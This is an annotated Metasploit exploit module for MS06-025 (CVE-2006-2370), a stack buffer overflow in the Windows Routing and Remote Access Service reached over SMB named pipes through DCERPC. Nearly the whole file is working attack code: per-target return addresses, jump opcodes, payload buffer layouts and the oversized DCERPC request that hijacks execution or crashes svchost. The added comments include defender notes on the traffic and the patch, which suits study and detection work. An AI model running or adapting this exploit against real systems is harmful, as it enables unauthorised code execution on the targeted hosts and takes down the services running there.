##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  # DCERPC gives dcerpc_handle/dcerpc_bind/dcerpc.call; SMB::Client gives
  # connect/smb_login/smb_peer_os/disconnect (presumed split — the mixins
  # are not shown on this page).
  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB::Client

  # Module metadata, payload constraints, targets and options for MS06-025
  # (CVE-2006-2370), a stack buffer overflow in the Windows Routing and
  # Remote Access Service reached over an SMB named pipe via DCERPC.
  #
  # @param info [Hash] module info merged by the framework through update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'MS06-025 Microsoft RRAS Service Overflow',
      'Description' => %q{
        This module exploits a stack buffer overflow in the Windows Routing and Remote
        Access Service. Since the service is hosted inside svchost.exe, a failed
        exploit attempt can cause other system services to fail as well. A valid
        username and password is required to exploit this flaw on Windows 2000.
        When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'. },
      'Author' =>
        [
          'Nicolas Pouvesle <nicolas.pouvesle[at]gmail.com>',
          'hdm'
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'CVE', '2006-2370' ],
          [ 'OSVDB', '26437' ],
          [ 'BID', '18325' ],
          [ 'MSB', 'MS06-025' ]
        ],
      'DefaultOptions' =>
        {
          # 'thread' ends only the payload's thread rather than the hosting
          # process (the service lives in svchost.exe, see Description).
          'EXITFUNC' => 'thread',
        },
      # The resulting session is flagged as privileged (service context).
      'Privileged' => true,
      'Payload' =>
        {
          # Fixed room for the encoded payload; the buffer layouts built in
          # #exploit are sized around this value.
          'Space' => 1104,
          # The nul byte is excluded from the encoded payload.
          'BadChars' => "\x00",
          'StackAdjustment' => -3500,
        },
      'Platform' => 'win',
      # One hard-coded return address per service pack. #exploit picks the
      # buffer *layout* from the detected OS string but always takes 'Ret'
      # from the user-selected target; a mismatch between the two is not checked.
      'Targets' =>
        [
          [ 'Windows 2000 SP4', { 'Ret' => 0x7571c1e4 } ],
          [ 'Windows XP SP1', { 'Ret' => 0x7248d4cc } ],
        ],

      'DisclosureDate' => '2006-06-13'))

    register_options(
      [
        # Named pipe the RPC interface is reached through; the Description
        # notes that XP SP1 requires SRVSVC.
        OptString.new('SMBPIPE', [ true, "The pipe name to use (ROUTER, SRVSVC)", 'ROUTER']),
      ])

    # SMB1 is forced in #exploit (connect(versions: [1])), so the
    # protocol-version option would be misleading and is hidden.
    deregister_options('SMB::ProtocolVersion')
  end

  # Post authentication bugs are rarely useful during automation
  # Returning false opts this module out of automated module selection.
  def autofilter
    false
  end

  # Runs the exploit: SMB1 session and login, DCERPC bind over the SMBPIPE
  # named pipe, one oversized request to opnum 0x0C, then hand-off to the
  # payload handler.
  #
  # Defender notes, all visible below: the on-the-wire sequence is an SMB1
  # login, a bind to interface 20610036-fa22-11cf-9823-00a0c911e5df on the
  # \ROUTER or \SRVSVC pipe, and a single 0x4000-byte request. Per the
  # Description a failed attempt takes down the svchost.exe hosting the
  # service, so crashed services after such traffic are a strong indicator;
  # the MS06-025 update (see References) is the fix.
  #
  # @raise [StandardError] any error from the DCERPC call other than
  #   NoResponse or a STATUS_PIPE_DISCONNECTED message is re-raised unchanged
  def exploit

    connect(versions: [1]) # SMB1 only; see deregister_options in #initialize
    smb_login() # credentials come from the SMB mixin's options (not shown here)

    # Interface UUID, interface version, named-pipe transport, and the pipe
    # path built from the SMBPIPE option.
    handle = dcerpc_handle('20610036-fa22-11cf-9823-00a0c911e5df', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])

    print_status("Binding to #{handle} ...")
    dcerpc_bind(handle)
    print_status("Bound to #{handle} ...")


    print_status('Getting OS...')

    # Check the remote OS name and version
    # (native version string: 5.0 is Windows 2000, 5.1 is Windows XP, as the
    # branches below relabel it). Only the buffer layout depends on this
    # string; the return address always comes from the selected target.
    os = smb_peer_os
    pat = ''

    case os
    when /Windows 5\.0/
      # Payload first, a 2-byte short jump over the 2 filler bytes plus the
      # 4-byte return address, and a 5-byte relative jump back (presumably
      # into the payload; the offset is tied to 'Space' above — TODO confirm
      # before changing either).
      pat =
        payload.encoded +
        "\xeb\x06" +
        rand_text_alphanumeric(2) +
        [target.ret].pack('V') +
        "\xe9\xb7\xfb\xff\xff"
      os = 'Windows 2000'
    when /Windows 5\.1/
      # 0x4c bytes of filler, a short jump over 2 filler bytes plus the
      # return address, then the payload immediately after.
      pat =
        rand_text_alphanumeric(0x4c) +
        "\xeb\x06" +
        rand_text_alphanumeric(2) +
        [target.ret].pack('V') +
        payload.encoded
      os = 'Windows XP'
    end
    # NOTE(review): if neither pattern matched, pat is still '' and a request
    # of pure random data is sent anyway; given the Description that is likely
    # to crash the service with nothing to show for it. An explicit fail_with
    # on an unrecognised OS string would be the safer behaviour.

    # Two little-endian DWORDs, the layout, then random padding so the request
    # is exactly 0x4000 bytes long.
    req = [1, 0x49].pack('VV') + pat + rand_text_alphanumeric(0x4000-pat.length)
    len = req.length
    # Looks like an NDR conformant buffer — a maximum-count field, the actual
    # length, the bytes, and the length again; confirm against the interface IDL.
    stb =
      NDR.long(0x20000) +
      NDR.long(len) +
      req +
      NDR.long(len)

    print_status("Calling the vulnerable function on #{os}...")

    begin
      dcerpc.call(0x0C, stb)
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse
      # Tolerated: the service is presumably no longer in a state to answer.
    rescue => e
      # A dropped pipe is also tolerated; anything else is a genuine failure.
      if e.to_s !~ /STATUS_PIPE_DISCONNECTED/
        raise e
      end
    end

    # Cleanup
    handler # hand control to the payload handler
    disconnect # close the SMB session
  end
end